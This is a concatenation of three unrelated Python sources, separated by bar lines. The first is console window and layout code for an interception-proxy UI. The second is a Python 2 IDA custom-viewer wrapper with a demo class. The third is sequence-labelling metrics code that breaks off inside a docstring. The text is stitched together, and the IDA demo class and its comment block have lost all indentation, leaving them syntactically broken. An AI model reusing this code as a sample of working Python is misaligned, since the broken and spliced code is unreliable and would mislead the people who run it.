            edit_focus_response_headers=grideditor.ResponseHeaderEditor(master),
        )
        self.stack = [base]
        self.overlay = None
    def set_overlay(self, o, **kwargs):
        # Wrap the requested widget in an overlay above the current widget.
        self.overlay = overlay.SimpleOverlay(
            self, o, self.top_widget(), o.width, **kwargs,
        )
    def top_window(self):
        """The current top window, ignoring any overlay."""
        return self.windows[self.stack[-1]]
    def top_widget(self):
        """The current top widget: the overlay if active, else the top window."""
        return self.overlay if self.overlay else self.top_window()
    def push(self, wname):
        # Pushing the window that is already on top is a no-op.
        if wname == self.stack[-1]:
            return
        prev = self.top_window()
        self.stack.append(wname)
        self.call("layout_pushed", prev)
    def pop(self, *args, **kwargs):
        """
        Pop the overlay (if any) or the top window off the stack.
        Return True if we're already at the base and nothing can be popped.
        """
        if not self.overlay and len(self.stack) == 1:
            return True
        self.call("layout_popping")
        if self.overlay:
            self.overlay = None
        else:
            self.stack.pop()
    def call(self, name, *args, **kwargs):
        """
        Invoke the named method on the top window, and also on the overlay
        if one is active.
        """
        getattr(self.top_window(), name)(*args, **kwargs)
        if self.overlay:
            getattr(self.overlay, name)(*args, **kwargs)
class Window(urwid.Frame):
    """Top-level console widget: one or two stacked panes plus a status bar."""
    def __init__(self, master):
        self.statusbar = statusbar.StatusBar(master)
        super().__init__(
            None,
            header = None,
            footer = urwid.AttrWrap(self.statusbar, "background")
        )
        self.master = master
        # Redraw whenever the flow view changes in any way.
        self.master.view.sig_view_refresh.connect(self.view_changed)
        self.master.view.sig_view_add.connect(self.view_changed)
        self.master.view.sig_view_remove.connect(self.view_changed)
        self.master.view.sig_view_update.connect(self.view_changed)
        self.master.view.focus.sig_change.connect(self.view_changed)
        self.master.view.focus.sig_change.connect(self.focus_changed)
        signals.focus.connect(self.sig_focus)
        signals.flow_change.connect(self.flow_changed)
        signals.pop_view_state.connect(self.pop)
        signals.push_view_state.connect(self.push)
        # Re-layout when the relevant console options change.
        self.master.options.subscribe(self.configure, ["console_layout"])
        self.master.options.subscribe(self.configure, ["console_layout_headers"])
        # Index into self.stacks of the currently focused pane.
        self.pane = 0
        self.stacks = [
            WindowStack(master, "flowlist"),
            WindowStack(master, "eventlog")
        ]
    def focus_stack(self):
        # The WindowStack of the currently focused pane.
        return self.stacks[self.pane]
    def configure(self, otions, updated):
        # Option-change callback: arguments are ignored, we simply re-layout.
        # NOTE(review): "otions" looks like a typo for "options"; renaming is
        # only safe if every subscriber is invoked positionally - verify.
        self.refresh()
    def refresh(self):
        """
        Redraw the layout.
        """
        c = self.master.options.console_layout
        if c == "single":
            self.pane = 0
        # Wrap the top widget of stack idx in a StackWidget pane, with a
        # title header only when console_layout_headers is enabled.
        def wrapped(idx):
            widget = self.stacks[idx].top_widget()
            if self.master.options.console_layout_headers:
                title = self.stacks[idx].top_window().title
            else:
                title = None
            return StackWidget(
                self,
                widget,
                title,
                self.pane == idx
            )
        w = None
        if c == "single":
            w = wrapped(0)
        elif c == "vertical":
            w = urwid.Pile(
                [
                    wrapped(i) for i, s in enumerate(self.stacks)
                ],
                focus_item=self.pane
            )
        else:
            # Default: horizontal split with a one-column divider.
            w = urwid.Columns(
                [wrapped(i) for i, s in enumerate(self.stacks)],
                dividechars=1,
                focus_column=self.pane
            )
        self.body = urwid.AttrWrap(w, "background")
    def flow_changed(self, sender, flow):
        # Only react when the changed flow is the currently focused one.
        if self.master.view.focus.flow:
            if flow.id == self.master.view.focus.flow.id:
                self.focus_changed()
    def focus_changed(self, *args, **kwargs):
        """
        Triggered when the focus changes - either when it's modified, or
        when it changes to a different flow altogether.
        """
        for i in self.stacks:
            i.call("focus_changed")
    def view_changed(self, *args, **kwargs):
        """
        Triggered when the view list has changed.
        """
        for i in self.stacks:
            i.call("view_changed")
    def set_overlay(self, o, **kwargs):
        """
        Set an overlay on the currently focused stack.
        """
        self.focus_stack().set_overlay(o, **kwargs)
        self.refresh()
    def push(self, wname):
        """
        Push a window onto the currently focused stack.
        """
        self.focus_stack().push(wname)
        self.refresh()
        self.view_changed()
        self.focus_changed()
    def pop(self, *args, **kwargs):
        """
        Pop a window from the currently focused stack. If there is only one
        window on the stack, this prompts for exit.
        """
        if self.focus_stack().pop():
            self.master.prompt_for_exit()
        else:
            self.refresh()
            self.view_changed()
            self.focus_changed()
    def stacks_sorted_by_focus(self):
        """
        Returns:
            self.stacks, with the focused stack first.
        """
        stacks = self.stacks.copy()
        stacks.insert(0, stacks.pop(self.pane))
        return stacks
    def current(self, keyctx):
        """
        Returns the active widget with a matching key context, including overlays.
        If multiple stacks have an active widget with a matching key context,
        the currently focused stack is preferred.
        """
        for s in self.stacks_sorted_by_focus():
            t = s.top_widget()
            if t.keyctx == keyctx:
                return t
    def current_window(self, keyctx):
        """
        Returns the active window with a matching key context, ignoring overlays.
        If multiple stacks have an active widget with a matching key context,
        the currently focused stack is preferred.
        """
        for s in self.stacks_sorted_by_focus():
            t = s.top_window()
            if t.keyctx == keyctx:
                return t
    def sig_focus(self, sender, section):
        # Move urwid's frame focus (header/body/footer) to the given section.
        self.focus_position = section
    def switch(self):
        """
        Switch between the two panes.
        """
        if self.master.options.console_layout == "single":
            self.pane = 0
        else:
            self.pane = (self.pane + 1) % len(self.stacks)
        self.refresh()
    def mouse_event(self, *args, **kwargs):
        # args: (size, event, button, col, row)
        k = super().mouse_event(*args, **kwargs)
        if not k:
            # Unhandled events: show a hint on drag, translate wheel
            # buttons (4/5) into cursor-key presses.
            if args[1] == "mouse drag":
                signals.status_message.send(
                    message = "Hold down fn, shift, alt or ctrl to select text or use the --set console_mouse=false parameter.",
                    expire = 1
                )
            elif args[1] == "mouse press" and args[2] == 4:
                self.keypress(args[0], "up")
            elif args[1] == "mouse press" and args[2] == 5:
                self.keypress(args[0], "down")
            else:
                return False
            return True
    def keypress(self, size, k):
        # Give widgets a first shot at the key; anything unhandled goes to
        # the global keymap, scoped by the focused widget's key context.
        k = super().keypress(size, k)
        if k:
            return self.master.keymap.handle(
                self.focus_stack().top_widget().keyctx,
                k
            )
class Screen(urwid.raw_display.Screen):
    """Raw-display screen that works around WSL rendering artifacts."""
    def write(self, data):
        if common.IS_WSL:
            # Strip SI/SO (shift-in/shift-out) control bytes, which produce
            # visual artifacts under WSL; their purpose in urwid's output
            # is unclear.
            data = data.replace("\x0e", "").replace("\x0f", "")
        super().write(data)
|
|
# -----------------------------------------------------------------------
# Standalone and testing code
# NOTE: this is a Python 2 module (print statements, xrange below).
import sys, struct
try:
    import _idaapi
except:
    # Not running inside IDA: the _idaapi bridge is unavailable, so bail out.
    print "Please try me from inside IDA"
    sys.exit(0)
try:
    # When the pywraps development module is present, route every pyscv_*
    # entry point through it instead of the built-in _idaapi implementations.
    import pywraps
    pywraps_there = True
    print "Using pywraps"
    _idaapi.pyscv_init = pywraps.pyscv_init
    _idaapi.pyscv_close = pywraps.pyscv_close
    _idaapi.pyscv_add_line = pywraps.pyscv_add_line
    _idaapi.pyscv_delete = pywraps.pyscv_delete
    _idaapi.pyscv_refresh = pywraps.pyscv_refresh
    _idaapi.pyscv_show = pywraps.pyscv_show
    _idaapi.pyscv_clear_popup_menu = pywraps.pyscv_clear_popup_menu
    _idaapi.pyscv_del_line = pywraps.pyscv_del_line
    _idaapi.pyscv_get_pos = pywraps.pyscv_get_pos
    _idaapi.pyscv_refresh_current = pywraps.pyscv_refresh_current
    _idaapi.pyscv_get_current_line = pywraps.pyscv_get_current_line
    _idaapi.pyscv_is_focused = pywraps.pyscv_is_focused
    _idaapi.pyscv_add_popup_menu = pywraps.pyscv_add_popup_menu
    _idaapi.pyscv_get_line = pywraps.pyscv_get_line
    _idaapi.pyscv_jumpto = pywraps.pyscv_jumpto
    _idaapi.pyscv_edit_line = pywraps.pyscv_edit_line
    _idaapi.pyscv_patch_line = pywraps.pyscv_patch_line
    _idaapi.pyscv_insert_line = pywraps.pyscv_insert_line
    _idaapi.pyscv_count = pywraps.pyscv_count
    _idaapi.pyscv_get_selection = pywraps.pyscv_get_selection
    _idaapi.pyscv_clear_lines = pywraps.pyscv_clear_lines
    _idaapi.pyscv_get_current_word = pywraps.pyscv_get_current_word
except:
    # NOTE(review): this bare except also hides genuine errors raised while
    # importing pywraps, not just its absence.
    pywraps_there = False
    print "Not using pywraps"
#<pycode(py_custviewer)>
class simplecustviewer_t(object):
    """The base class for implementing simple custom viewers.

    Thin wrapper around the pyscv_* C entry points; ``self.__this`` is the
    opaque handle of the associated C++ viewer object.
    """
    def __init__(self):
        # Opaque handle to the underlying C++ viewer; set by Create().
        self.__this = None
    def __del__(self):
        """Destructor. It also frees the associated C++ object"""
        try:
            _idaapi.pyscv_delete(self.__this)
        except:
            # Deliberate best-effort cleanup (e.g. during interpreter
            # shutdown, when _idaapi may already be gone).
            pass
    @staticmethod
    def __make_sl_arg(line, fgcolor=None, bgcolor=None):
        # Pack a line plus optional colors into the form the pyscv_* calls
        # expect: the bare line when no color is given, else a 3-tuple.
        return line if (fgcolor is None and bgcolor is None) else (line, fgcolor, bgcolor)
    def Create(self, title):
        """
        Creates the custom view. This should be the first method called after instantiation
        @param title: The title of the view
        @return: Boolean whether it succeeds or fails. It may fail if a window with the same title is already open.
                 In this case better close existing windows
        """
        self.title = title
        self.__this = _idaapi.pyscv_init(self, title)
        return True if self.__this else False
    def Close(self):
        """
        Destroys the view.
        One has to call Create() afterwards.
        Show() can be called and it will call Create() internally.
        @return: Boolean
        """
        return _idaapi.pyscv_close(self.__this)
    def Show(self):
        """
        Shows an already created view. If the view was closed, then it will call Create() for you
        @return: Boolean
        """
        return _idaapi.pyscv_show(self.__this)
    def Refresh(self):
        # Redraws the whole view.
        return _idaapi.pyscv_refresh(self.__this)
    def RefreshCurrent(self):
        """Refreshes the current line only"""
        return _idaapi.pyscv_refresh_current(self.__this)
    def Count(self):
        """Returns the number of lines in the view"""
        return _idaapi.pyscv_count(self.__this)
    def GetSelection(self):
        """
        Returns the selected area or None
        @return:
            - tuple(x1, y1, x2, y2)
            - None if no selection
        """
        return _idaapi.pyscv_get_selection(self.__this)
    def ClearLines(self):
        """Clears all the lines"""
        _idaapi.pyscv_clear_lines(self.__this)
    def AddLine(self, line, fgcolor=None, bgcolor=None):
        """
        Adds a colored line to the view
        @return: Boolean
        """
        return _idaapi.pyscv_add_line(self.__this, self.__make_sl_arg(line, fgcolor, bgcolor))
    def InsertLine(self, lineno, line, fgcolor=None, bgcolor=None):
        """
        Inserts a line in the given position
        @return: Boolean
        """
        return _idaapi.pyscv_insert_line(self.__this, lineno, self.__make_sl_arg(line, fgcolor, bgcolor))
    def EditLine(self, lineno, line, fgcolor=None, bgcolor=None):
        """
        Edits an existing line.
        @return: Boolean
        """
        return _idaapi.pyscv_edit_line(self.__this, lineno, self.__make_sl_arg(line, fgcolor, bgcolor))
    def PatchLine(self, lineno, offs, value):
        """Patches an existing line character at the given offset. This is a low level function. You must know what you're doing"""
        return _idaapi.pyscv_patch_line(self.__this, lineno, offs, value)
    def DelLine(self, lineno):
        """
        Deletes an existing line
        @return: Boolean
        """
        return _idaapi.pyscv_del_line(self.__this, lineno)
    def GetLine(self, lineno):
        """
        Returns a line
        @param lineno: The line number
        @return:
            Returns a tuple (colored_line, fgcolor, bgcolor) or None
        """
        return _idaapi.pyscv_get_line(self.__this, lineno)
    def GetCurrentWord(self, mouse = 0):
        """
        Returns the current word
        @param mouse: Use mouse position or cursor position
        @return: None if failed or a String containing the current word at mouse or cursor
        """
        return _idaapi.pyscv_get_current_word(self.__this, mouse)
    def GetCurrentLine(self, mouse = 0, notags = 0):
        """
        Returns the current line.
        @param mouse: Current line at mouse pos
        @param notags: If True then tag_remove() will be called before returning the line
        @return: Returns the current line (colored or uncolored) or None on failure
        """
        return _idaapi.pyscv_get_current_line(self.__this, mouse, notags)
    def GetPos(self, mouse = 0):
        """
        Returns the current cursor or mouse position.
        @param mouse: return mouse position
        @return: Returns a tuple (lineno, x, y)
        """
        return _idaapi.pyscv_get_pos(self.__this, mouse)
    def GetLineNo(self, mouse = 0):
        """Calls GetPos() and returns the current line number or -1 on failure"""
        r = self.GetPos(mouse)
        return -1 if not r else r[0]
    def Jump(self, lineno, x=0, y=0):
        # Moves the cursor to the given line and column coordinates.
        return _idaapi.pyscv_jumpto(self.__this, lineno, x, y)
    def AddPopupMenu(self, title, hotkey=""):
        """
        Adds a popup menu item
        @param title: The name of the menu item
        @param hotkey: Hotkey of the item or just empty
        @return: Returns the menu item ID; compare it against the value
                 passed to OnPopupMenu(). (Presumably a false value on
                 failure -- TODO confirm.)
        """
        return _idaapi.pyscv_add_popup_menu(self.__this, title, hotkey)
    def ClearPopupMenu(self):
        """
        Clears all previously installed popup menu items.
        Use this function if you're generating menu items on the fly (in the OnPopup() callback),
        and before adding new items
        """
        _idaapi.pyscv_clear_popup_menu(self.__this)
    def IsFocused(self):
        """Returns True if the current view is the focused view"""
        return _idaapi.pyscv_is_focused(self.__this)
# Here are all the supported events
#<pydoc>
# def OnClick(self, shift):
# """
# User clicked in the view
# @param shift: Shift flag
# @return: Boolean. True if you handled the event
# """
# print "OnClick, shift=%d" % shift
# return True
#
# def OnDblClick(self, shift):
# """
# User dbl-clicked in the view
# @param shift: Shift flag
# @return: Boolean. True if you handled the event
# """
# print "OnDblClick, shift=%d" % shift
# return True
#
# def OnCursorPosChanged(self):
# """
# Cursor position changed.
# @return: Nothing
# """
# print "OnCurposChanged"
#
# def OnClose(self):
# """
# The view is closing. Use this event to cleanup.
# @return: Nothing
# """
# print "OnClose"
#
# def OnKeydown(self, vkey, shift):
# """
# User pressed a key
# @param vkey: Virtual key code
# @param shift: Shift flag
# @return: Boolean. True if you handled the event
# """
# print "OnKeydown, vk=%d shift=%d" % (vkey, shift)
# return False
#
# def OnPopup(self):
# """
# Context menu popup is about to be shown. Create items dynamically if you wish
# @return: Boolean. True if you handled the event
# """
# print "OnPopup"
#
# def OnHint(self, lineno):
# """
# Hint requested for the given line number.
# @param lineno: The line number (zero based)
# @return:
# - tuple(number of important lines, hint string)
# - None: if no hint available
# """
# return (1, "OnHint, line=%d" % lineno)
#
# def OnPopupMenu(self, menu_id):
# """
# A context (or popup) menu item was executed.
# @param menu_id: ID previously registered with add_popup_menu()
# @return: Boolean
# """
#     print "OnPopupMenu, menu_id=%d" % menu_id
# return True
#</pydoc>
#</pycode(py_custviewer)>
#<pycode(py_custviewerex1)>
# -----------------------------------------------------------------------
class mycv_t(simplecustviewer_t):
def Create(self, sn=None):
# Form the title
title = "Simple custom view test"
if sn:
title += " %d" % sn
# Create the customviewer
if not simplecustviewer_t.Create(self, title):
return False
self.menu_hello = self.AddPopupMenu("Hello")
self.menu_world = self.AddPopupMenu("World")
for i in xrange(0, 100):
self.AddLine("Line %d" % i)
# self.Jump(0)
return True
def OnClick(self, shift):
"""
User clicked in the view
@param shift: Shift flag
@return: Boolean. True if you handled the event
"""
print "OnClick, shift=%d" % shift
return True
def OnDblClick(self, shift):
"""
User dbl-clicked in the view
@param shift: Shift flag
@return: Boolean. True if you handled the event
"""
word = self.GetCurrentWord()
if not word: word = "<None>"
print "OnDblClick, shift=%d, current word=%s" % (shift, word)
return True
def OnCursorPosChanged(self):
"""
Cursor position changed.
@return: Nothing
"""
print "OnCurposChanged"
def OnClose(self):
"""
The view is closing. Use this event to cleanup.
@return: Nothing
"""
print "OnClose " + self.title
def OnKeydown(self, vkey, shift):
"""
User pressed a key
@param vkey: Virtual key code
@param shift: Shift flag
@return: Boolean. True if you handled the event
"""
print "OnKeydown, vk=%d shift=%d" % (vkey, shift)
# ESCAPE?
if vkey == 27:
self.Close()
# VK_DELETE
elif vkey == 46:
n = self.GetLineNo()
if n is not None:
self.DelLine(n)
self.Refresh()
print "Deleted line %d" % n
# Goto?
elif vkey == ord('G'):
n = self.GetLineNo()
if n is not None:
v = idc.AskLong(self.GetLineNo(), "Where to go?")
if v:
self.Jump(v, 0, 5)
elif vkey == ord('R'):
print "refreshing...."
self.Refresh()
elif vkey == ord('C'):
print "refreshing current line..."
self.RefreshCurrent()
elif vkey == ord('A'):
s = idc.AskStr("NewLine%d" % self.Count(), "Append new line")
self.AddLine(s)
self.Refresh()
elif vkey == ord('X'):
print "Clearing all lines"
self.ClearLines()
self.Refresh()
elif vkey == ord('I'):
n = self.GetLineNo()
s = idc.AskStr("InsertedLine%d" % n, "Insert new line")
self.InsertLine(n, s)
self.Refresh()
elif vkey == ord('E'):
l = self.GetCurrentLine(notags=1)
if not l:
return False
n = self.GetLineNo()
print "curline=<%s>" % l
l = l + idaapi.COLSTR("*", idaapi.SCOLOR_VOIDOP)
self.EditLine(n, l)
self.RefreshCurrent()
print "Edited line %d" % n
else:
return False
return True
def OnPopup(self):
"""
Context menu popup is about to be shown. Create items dynamically if you wish
@return: Boolean. True if you handled the event
"""
print "OnPopup"
def OnHint(self, lineno):
"""
Hint requested for the given line number.
@param lineno: The line number (zero based)
@return:
- tuple(number of important lines, hint string)
- None: if no hint available
"""
return (1, "OnHint, line=%d" % lineno)
def OnPopupMenu(self, menu_id):
"""
A context (or popup) menu item was executed.
@param menu_id: ID previously registered with AddPopupMenu()
@return: Boolean
"""
print "OnPopupMenu, menu_id=%d" % menu_id
if menu_id == self.menu_hello:
print "Hello"
elif menu_id == self.menu_world:
print "World"
else:
# Unhandled
return False
return True
# -----------------------------------------------------------------------
try:
    # created already?
    # (Referencing the bare name raises NameError on the first run.)
    mycv
    print "Already created, will close it..."
    mycv.Close()
    del mycv
except:
    pass
def show_win():
    # Create and show a single viewer; returns it, or None on failure.
    x = mycv_t()
    if not x.Create():
        print "Failed to create!"
        return None
    x.Show()
    return x
mycv = show_win()
if not mycv:
    # On failure, remove the name entirely so later references raise
    # NameError instead of silently seeing None.
    del mycv
def make_many(n):
    # Create and show n numbered viewers; stops early if creation fails.
    L = []
    for i in xrange(1, n+1):
        v = mycv_t()
        if not v.Create(i):
            break
        v.Show()
        L.append(v)
    return L
#</pycode(py_custviewerex1)>
|
|
import warnings
from typing import Callable, List, Optional, Tuple, Type, Union
import numpy as np
from sklearn.exceptions import UndefinedMetricWarning
from seqeval.reporters import DictReporter, StringReporter
from seqeval.scheme import Entities, Token, auto_detect
PER_CLASS_SCORES = Tuple[List[float], List[float], List[float], List[int]]
AVERAGE_SCORES = Tuple[float, float, float, int]
SCORES = Union[PER_CLASS_SCORES, AVERAGE_SCORES]
def _prf_divide(numerator, denominator, metric,
modifier, average, warn_for, zero_division='warn'):
"""Performs division and handles divide-by-zero.
On zero-division, sets the corresponding result elements equal to
0 or 1 (according to ``zero_division``). Plus, if
``zero_division != "warn"`` raises a warning.
The metric, modifier and average arguments are used only for determining
an appropriate warning.
"""
mask = denominator == 0.0
denominator = denominator.copy()
denominator[mask] = 1 # avoid infs/nans
result = numerator / denominator
if not np.any(mask):
return result
# if ``zero_division=1``, set those with denominator == 0 equal to 1
result[mask] = 0.0 if zero_division in ['warn', 0] else 1.0
# the user will be removing warnings if zero_division is set to something
# different than its default value. If we are computing only f-score
# the warning will be raised only if precision and recall are ill-defined
if zero_division != 'warn' or metric not in warn_for:
return result
# build appropriate warning
# E.g. "Precision and F-score are ill-defined and being set to 0.0 in
# labels with no predicted samples. Use ``zero_division`` parameter to
# control this behavior."
if metric in warn_for and 'f-score' in warn_for:
msg_start = '{0} and F-score are'.format(metric.title())
elif metric in warn_for:
msg_start = '{0} is'.format(metric.title())
elif 'f-score' in warn_for:
msg_start = 'F-score is'
else:
return result
_warn_prf(average, modifier, msg_start, len(result))
return result
def _warn_prf(average, modifier, msg_start, result_size):
    """Emit an ``UndefinedMetricWarning`` describing ill-defined scores."""
    axis0, axis1 = 'sample', 'label'
    if average == 'samples':
        # For sample-averaging the roles of samples and labels swap.
        axis0, axis1 = axis1, axis0
    template = ('{0} ill-defined and being set to 0.0 {{0}} '
                'no {1} {2}s. Use `zero_division` parameter to control'
                ' this behavior.'.format(msg_start, modifier, axis0))
    if result_size == 1:
        message = template.format('due to')
    else:
        message = template.format('in {0}s with'.format(axis1))
    # stacklevel=2 attributes the warning to _warn_prf's caller.
    warnings.warn(message, UndefinedMetricWarning, stacklevel=2)
def unique_labels(y_true: List[List[str]], y_pred: List[List[str]],
                  scheme: Type[Token], suffix: bool = False) -> List[str]:
    """Return the sorted union of entity tags seen in truth and prediction."""
    tags_true = Entities(y_true, scheme, suffix).unique_tags
    tags_pred = Entities(y_pred, scheme, suffix).unique_tags
    return sorted(tags_true | tags_pred)
def check_consistent_length(y_true: List[List[str]], y_pred: List[List[str]]):
    """Validate that ``y_true`` and ``y_pred`` are lists of lists of equal shape.

    Args:
        y_true : 2d array.
        y_pred : 2d array.

    Raises:
        TypeError: if either argument contains an element that is not a list.
        ValueError: if the sequence counts or per-sequence lengths differ.
    """
    len_true = [len(seq) for seq in y_true]
    len_pred = [len(seq) for seq in y_pred]
    element_types = set(map(type, y_true)) | set(map(type, y_pred))
    if element_types != {list}:
        raise TypeError('Found input variables without list of list.')
    if len(y_true) != len(y_pred) or len_true != len_pred:
        raise ValueError(
            'Found input variables with inconsistent numbers of samples:\n'
            '{}\n{}'.format(len_true, len_pred)
        )
def _precision_recall_fscore_support(y_true: List[List[str]],
                                     y_pred: List[List[str]],
                                     *,
                                     average: Optional[str] = None,
                                     warn_for=('precision', 'recall', 'f-score'),
                                     beta: float = 1.0,
                                     sample_weight: Optional[List[int]] = None,
                                     zero_division: str = 'warn',
                                     scheme: Optional[Type[Token]] = None,
                                     suffix: bool = False,
                                     extract_tp_actual_correct: Callable = None) -> SCORES:
    """Core precision/recall/F-beta/support computation.

    ``extract_tp_actual_correct(y_true, y_pred, suffix, scheme)`` must return
    per-class ``(pred_sum, tp_sum, true_sum)`` count arrays; this function
    handles averaging, the zero-division policy and warnings.
    """
    if beta < 0:
        raise ValueError('beta should be >=0 in the F-beta score')
    average_options = (None, 'micro', 'macro', 'weighted')
    if average not in average_options:
        raise ValueError('average has to be one of {}'.format(average_options))
    check_consistent_length(y_true, y_pred)
    pred_sum, tp_sum, true_sum = extract_tp_actual_correct(y_true, y_pred, suffix, scheme)
    if average == 'micro':
        # Micro-averaging: collapse per-class counts into global totals first.
        tp_sum = np.array([tp_sum.sum()])
        pred_sum = np.array([pred_sum.sum()])
        true_sum = np.array([true_sum.sum()])
    # Finally, we have all our sufficient statistics. Divide! #
    beta2 = beta ** 2
    # Divide, and on zero-division, set scores and/or warn according to
    # zero_division:
    precision = _prf_divide(
        numerator=tp_sum,
        denominator=pred_sum,
        metric='precision',
        modifier='predicted',
        average=average,
        warn_for=warn_for,
        zero_division=zero_division
    )
    recall = _prf_divide(
        numerator=tp_sum,
        denominator=true_sum,
        metric='recall',
        modifier='true',
        average=average,
        warn_for=warn_for,
        zero_division=zero_division
    )
    # warn for f-score only if zero_division is warn, it is in warn_for
    # and BOTH prec and rec are ill-defined
    if zero_division == 'warn' and ('f-score',) == warn_for:
        if (pred_sum[true_sum == 0] == 0).any():
            _warn_prf(
                average, 'true nor predicted', 'F-score is', len(true_sum)
            )
    # if tp == 0 F will be 1 only if all predictions are zero, all labels are
    # zero, and zero_division=1. In all other case, 0
    if np.isposinf(beta):
        # beta -> inf: F-beta converges to recall.
        f_score = recall
    else:
        denom = beta2 * precision + recall
        denom[denom == 0.] = 1  # avoid division by 0
        f_score = (1 + beta2) * precision * recall / denom
    # Average the results
    if average == 'weighted':
        weights = true_sum
        if weights.sum() == 0:
            zero_division_value = 0.0 if zero_division in ['warn', 0] else 1.0
            # precision is zero_division if there are no positive predictions
            # recall is zero_division if there are no positive labels
            # fscore is zero_division if all labels AND predictions are
            # negative
            return (zero_division_value if pred_sum.sum() == 0 else 0.0,
                    zero_division_value,
                    zero_division_value if pred_sum.sum() == 0 else 0.0,
                    sum(true_sum))
    elif average == 'samples':
        # NOTE(review): unreachable - 'samples' is rejected by the
        # average_options check above.
        weights = sample_weight
    else:
        weights = None
    if average is not None:
        precision = np.average(precision, weights=weights)
        recall = np.average(recall, weights=weights)
        f_score = np.average(f_score, weights=weights)
        true_sum = sum(true_sum)
    return precision, recall, f_score, true_sum
def precision_recall_fscore_support(y_true: List[List[str]],
                                    y_pred: List[List[str]],
                                    *,
                                    average: Optional[str] = None,
                                    warn_for=('precision', 'recall', 'f-score'),
                                    beta: float = 1.0,
                                    sample_weight: Optional[List[int]] = None,
                                    zero_division: str = 'warn',
                                    scheme: Optional[Type[Token]] = None,
                                    suffix: bool = False,
                                    **kwargs) -> SCORES:
    """Compute precision, recall, F-measure and support for each class.
    Args:
        y_true : 2d array. Ground truth (correct) target values.
        y_pred : 2d array. Estimated targets as returned by a tagger.
        beta : float, 1.0 by default
            The strength of recall versus precision in the F-score.
        average : string, [None (default), 'micro', 'macro', 'weighted']
            If ``None``, the scores for each class are returned. Otherwise, this
            determines the type of averaging performed on the data:
            ``'micro'``:
                Calculate metrics globally by counting the total true positives,
                false negatives and false positives.
            ``'macro'``:
                Calculate metrics for each label, and find their unweighted
                mean.  This does not take label imbalance into account.
            ``'weighted'``:
                Calculate metrics for each label, and find their average weighted
                by support (the number of true instances for each label). This
                alters 'macro' to account for label imbalance; it can result in an
                F-score that is not between precision and recall.
        warn_for : tuple or set, for internal use
            This determines which warnings will be made in the case that this
            function is being used to return only one of its metrics.
        sample_weight : array-like of shape (n_samples,), default=None
            Sample weights.
        zero_division : "warn", 0 or 1, default="warn"
            Sets the value to return when there is a zero division:
               - recall: when there are no positive labels
               - precision: when there are no positive predictions
               - f-score: both
            If set to "warn", this acts as 0, but warnings are also raised.
        scheme : Token, [IOB2, IOE2, IOBES]
        suffix : bool, False by default.
    Returns:
        precision : float (if average is not None) or array of float, shape = [n_unique_labels]
        recall : float (if average is not None) or array of float, , shape = [n_unique_labels]
        fbeta_score : float (if average is not None) or array of float, shape = [n_unique_labels]
        support : int (if average is not None) or array of int, shape = [n_unique_labels]
            The number of occurrences of each label in ``y_true``.
    Examples:
        >>> from seqeval.metrics.v1 import precision_recall_fscore_support
        >>> from seqeval.scheme import IOB2
        >>> y_true = [['O', 'O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
        >>> y_pred = [['O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
        >>> precision_recall_fscore_support(y_true, y_pred, average='macro', scheme=IOB2)
        (0.5, 0.5, 0.5, 2)
        >>> precision_recall_fscore_support(y_true, y_pred, average='micro', scheme=IOB2)
        (0.5, 0.5, 0.5, 2)
        >>> precision_recall_fscore_support(y_true, y_pred, average='weighted', scheme=IOB2)
        (0.5, 0.5, 0.5, 2)
        It is possible to compute per-label precisions, recalls, F1-scores and
        supports instead of averaging:
        >>> precision_recall_fscore_support(y_true, y_pred, average=None, scheme=IOB2)
        (array([0., 1.]), array([0., 1.]), array([0., 1.]), array([1, 1]))
    Notes:
        When ``true positive + false positive == 0``, precision is undefined;
        When ``true positive + false negative == 0``, recall is undefined.
        In such cases, by default the metric will be set to 0, as will f-score,
        and ``UndefinedMetricWarning`` will be raised. This behavior can be
        modified with ``zero_division``.
    """
    def extract_tp_actual_correct(y_true, y_pred, suffix, scheme):
        # If this function is called from classification_report,
        # try to reuse entities to optimize the function.
        entities_true = kwargs.get('entities_true') or Entities(y_true, scheme, suffix)
        entities_pred = kwargs.get('entities_pred') or Entities(y_pred, scheme, suffix)
        target_names = sorted(entities_true.unique_tags | entities_pred.unique_tags)
        tp_sum = np.array([], dtype=np.int32)
        pred_sum = np.array([], dtype=np.int32)
        true_sum = np.array([], dtype=np.int32)
        for type_name in target_names:
            # Per-class counts: true entities, predicted entities, and their
            # overlap (true positives) for this entity type.
            entities_true_type = entities_true.filter(type_name)
            entities_pred_type = entities_pred.filter(type_name)
            tp_sum = np.append(tp_sum, len(entities_true_type & entities_pred_type))
            pred_sum = np.append(pred_sum, len(entities_pred_type))
            true_sum = np.append(true_sum, len(entities_true_type))
        return pred_sum, tp_sum, true_sum
    # Delegate averaging and zero-division handling to the shared core.
    precision, recall, f_score, true_sum = _precision_recall_fscore_support(
        y_true, y_pred,
        average=average,
        warn_for=warn_for,
        beta=beta,
        sample_weight=sample_weight,
        zero_division=zero_division,
        scheme=scheme,
        suffix=suffix,
        extract_tp_actual_correct=extract_tp_actual_correct
    )
    return precision, recall, f_score, true_sum
def classification_report(y_true: List[List[str]],
                          y_pred: List[List[str]],
                          *,
                          sample_weight: Optional[List[int]] = None,
                          digits: int = 2,
                          output_dict: bool = False,
                          zero_division: str = 'warn',
                          suffix: bool = False,
                          scheme: Type[Token] = None) -> Union[str, dict]:
    """Build a text report showing the main tagging metrics.
    Args:
        y_true : 2d array. Ground truth (correct) target values.
        y_pred : 2d array. Estimated targets as returned by a classifier.
        sample_weight : array-like of shape (n_samples,), default=None
            Sample weights.
        digits : int. Number of digits for formatting output floating point values.
        output_dict : bool(default=False). If True, return output as dict else str.
        zero_division : "warn", 0 or 1, default="warn"
            Sets the value to return when there is a zero division:
               - recall: when there are no positive labels
               - precision: when there are no positive predictions
               - f-score: both
            If set to "warn", this acts as 0, but warnings are also raised.
        scheme : Token, [IOB2, IOE2, IOBES]
        suffix : bool, False by default.
    Returns:
        report : string/dict. Summary of the precision, recall, F1 score for each class.
    Examples:
        >>> from seqeval.metrics.v1 import classification_report
        >>> y_true = [['O', 'O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
        >>> y_pred = [['O', 'O', 'B-MISC', 'I-MISC', 'I-MISC', 'I-MISC', 'O'], ['B-PER', 'I-PER', 'O']]
        >>> print(classification_report(y_true, y_pred))
                      precision    recall  f1-score   support
        <BLANKLINE>
                MISC       0.00      0.00      0.00         1
                 PER       1.00      1.00      1.00         1
